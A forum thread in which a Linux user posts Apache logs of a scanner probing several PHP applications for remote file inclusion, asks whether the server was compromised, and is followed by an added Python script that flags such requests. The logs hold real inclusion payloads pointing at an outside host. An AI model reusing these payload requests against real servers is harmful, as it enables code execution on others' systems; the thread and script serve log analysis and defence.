  1. #1
    Just Joined!
    Join Date
    Mar 2007
    Posts
    36

    Is someone breaking into my system?

    Found this block in my error logs:

    Code:
    [Fri Jul 11 22:16:50 2008] [error] [client Ip removed] script '/var/www/index.php' not found or unable to stat
    [Fri Jul 11 22:16:50 2008] [error] [client ip removed] script '/var/www/index.php' not found or unable to stat
    [Fri Jul 11 22:16:50 2008] [error] [client ip removed] File does not exist: /var/www/dotproject
    [Fri Jul 11 22:16:50 2008] [error] [client ip removed] File does not exist: /var/www/dotproject
    [Fri Jul 11 22:16:50 2008] [error] [client ipremoved] File does not exist: /var/www/cacti
    [Fri Jul 11 22:16:50 2008] [error] [clientip removed] File does not exist: /var/www/cacti
    [Fri Jul 11 22:16:50 2008] [error] [client ip removed] script '/var/www/index2.php' not found or unable to stat
    [Fri Jul 11 22:16:50 2008] [error] [client ip removed] script '/var/www/index2.php' not found or unable to stat
    [Fri Jul 11 22:16:51 2008] [error] [client ip removed] File does not exist: /var/www/admin
    [Fri Jul 11 22:16:51 2008] [error] [client ip removed] File does not exist: /var/www/admin
    [Fri Jul 11 22:16:52 2008] [error] [client ip removed] File does not exist: /var/www/webcalendar
    [Fri Jul 11 22:16:52 2008] [error] [client ip removed] File does not exist: /var/www/webcalendar
    [Sat Jul 12 01:27:20 2008] [error] [client ip removed] script '/var/www/index.php' not found or unable to stat
    [Sat Jul 12 01:27:20 2008] [error] [client ip removed] script '/var/www/index.php' not found or unable to stat
    [Sat Jul 12 01:27:20 2008] [error] [client ip removed] File does not exist: /var/www/dotproject
    [Sat Jul 12 01:27:20 2008] [error] [client ip removed] File does not exist: /var/www/dotproject
    [Sat Jul 12 01:27:20 2008] [error] [client ip removed] File does not exist: /var/www/cacti
    [Sat Jul 12 01:27:20 2008] [error] [client ip removed] File does not exist: /var/www/cacti
    [Sat Jul 12 01:27:20 2008] [error] [client ip removed] script '/var/www/index2.php' not found or unable to stat
    [Sat Jul 12 01:27:20 2008] [error] [client ip removed] script '/var/www/index2.php' not found or unable to stat
    [Sat Jul 12 01:27:21 2008] [error] [client ip removed] File does not exist: /var/www/admin
    [Sat Jul 12 01:27:21 2008] [error] [client ip removed] File does not exist: /var/www/admin
    [Sat Jul 12 01:27:21 2008] [error] [client ip removed] File does not exist: /var/www/webcalendar
    [Sat Jul 12 01:27:22 2008] [error] [client ip removed] File does not exist: /var/www/webcalendar
    Not one of those folders, i.e., Dotproject, Cacti, etc., exists on my server, nor have they ever. Is someone on some sort of a fishing expedition here? Why would someone look for /var/www/admin?
    How could I make sure that this person does NOT get to see anything other than the /var/www folder? Or that he doesn't have permissions to write to any of my files??

    Here is also a block from my access logs. Same IP, same day, same time:

    Code:
    IP removed - - [12/Jul/2008:01:27:20 -0500] "GET /index.php?id=http://mystres.com/1.gif?/ HTTP/1.1" 404 303 "-" "Morfeus ****ing Scanner"
    IP removed - - [12/Jul/2008:01:27:20 -0500] "GET /index.php?id=http://mystres.com/1.gif?/ HTTP/1.1" 404 303 "-" "Morfeus ****ing Scanner"
    "GET /dotproject/includes/db_adodb.php?baseDir=http://mystres.com/1.gif?/ HTTP/1.1" 404 326 "-" "Morfeus ****ing Scanner"
    [12/Jul/2008:01:27:20 -0500] "GET /dotproject/includes/db_adodb.php?baseDir=http://mystres.com/1.gif?/ HTTP/1.1" 404 326 "-" "Morfeus ****ing Scanner"
    [12/Jul/2008:01:27:20 -0500] "GET /cacti/include/config_settings.php?config[include_path]=http://mystres.com/1.gif?/ HTTP/1.1" 404 327 "-" "Morfeus Fuc
    [12/Jul/2008:01:27:20 -0500] "GET /cacti/include/config_settings.php?config[include_path]=http://mystres.com/1.gif?/ HTTP/1.1" 404 327 "-" "Morfeus Fuc
    [12/Jul/2008:01:27:20 -0500] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mystres.com/1.gif
    [12/Jul/2008:01:27:20 -0500] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://mystres.com/1.gif
    [12/Jul/2008:01:27:21 -0500] "GET /admin/business_inc/saveserver.php?thisdir=http://mystres.com/1.gif?/ HTTP/1.1" 404 327 "-" "Morfeus ****ing Scanner"
    [12/Jul/2008:01:27:21 -0500] "GET /admin/business_inc/saveserver.php?thisdir=http://mystres.com/1.gif?/ HTTP/1.1" 404 327 "-" "Morfeus ****ing Scanner"
    [12/Jul/2008:01:27:21 -0500] "GET /webcalendar/tools/send_reminders.php?includedir=http://mystres.com/1.gif?/ HTTP/1.1" 404 330 "-" "Morfeus ****ing Sc
    [12/Jul/2008:01:27:22 -0500] "GET /webcalendar/tools/send_reminders.php?includedir=http://mystres.com/1.gif?/ HTTP/1.1" 404 330 "-" "Morfeus ****ing Sc
    [12/Jul/2008:01:27:22 -0500] "GET / HTTP/1.1" 200 2935 "-" "Morfeus ****ing Scanner"
    [12/Jul/2008:01:27:22 -0500] "GET / HTTP/1.1" 200 2935 "-" "Morfeus ****ing Scanner"
    What's going on here, anyway? I'm hopelessly confused. Sorry for posting the "bad language" in the code, but ...

  2. #2
    Super Moderator MikeTbob
    Join Date
    Apr 2006
    Location
    Texas
    Posts
    7,144
    Check this link, sounds kinda scary to me.
    http://blog.yaay.us/?cat=8
    I do not respond to private messages asking for Linux help, Please keep it on the forums only.

  3. #3
    Just Joined!
    Join Date
    Mar 2007
    Posts
    36
    Yipes!

    Ok, so is there any way of checking to see if this attack was "successful" in engaging my server to serve these functions?

    I'm quite green at Linux, especially security stuff, so any help here would be very much appreciated!

    Thank you for your link, MikeTbob.

    Another question is, I haven't even "launched" my website, it's not really on public internet yet. How has this scanner then found my server? Is it possible that it's embedded on a different server on my LAN? (We do have an Ubuntu set up)
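
An added example, not part of the original thread: one way to triage an Apache access log for the pattern shown in post #1, where a query-string parameter carries a remote URL, and to separate probes the server rejected from ones that reached an existing script. The sample lines are constructed (documentation IP addresses, the placeholder host `remote.example`, the agent string `ExampleScanner`, and a hypothetical `/page.php` request answered with 200).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format:
# host ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+'
)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def triage(lines):
    """Return (host, path, param, status, verdict) for every request that
    passes a remote URL as a query-string value."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # truncated or otherwise unparseable line
        parts = urlsplit(m['target'])
        status = int(m['status'])
        # parse_qsl percent-decodes values, so encoded URLs are caught too
        for name, value in parse_qsl(parts.query):
            if REMOTE_URL_RE.match(value):
                # 4xx: the targeted script was missing or refused, nothing ran.
                # Anything else: the script exists and handled the request,
                # so it needs a manual look (code, PHP settings, new files).
                verdict = 'rejected' if 400 <= status < 500 else 'review'
                findings.append((m['host'], parts.path, name, status, verdict))
    return findings

# Constructed sample lines modelled on the access log in post #1.
SAMPLE = [
    '192.0.2.10 - - [12/Jul/2008:01:27:20 -0500] "GET /index.php?id=http://remote.example/1.gif?/ HTTP/1.1" 404 303 "-" "ExampleScanner"',
    '192.0.2.10 - - [12/Jul/2008:01:27:20 -0500] "GET /cacti/include/config_settings.php?config[include_path]=http://remote.example/1.gif?/ HTTP/1.1" 404 327 "-" "ExampleScanner"',
    '192.0.2.10 - - [12/Jul/2008:01:27:22 -0500] "GET / HTTP/1.1" 200 2935 "-" "ExampleScanner"',
    '198.51.100.7 - - [12/Jul/2008:02:00:00 -0500] "GET /page.php?inc=http%3A%2F%2Fremote.example%2F1.gif HTTP/1.1" 200 512 "-" "ExampleScanner"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

A `review` verdict only means the request reached a script that exists; whether the remote URL was actually fetched depends on that script and on PHP settings such as `allow_url_include` and `allow_url_fopen`.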
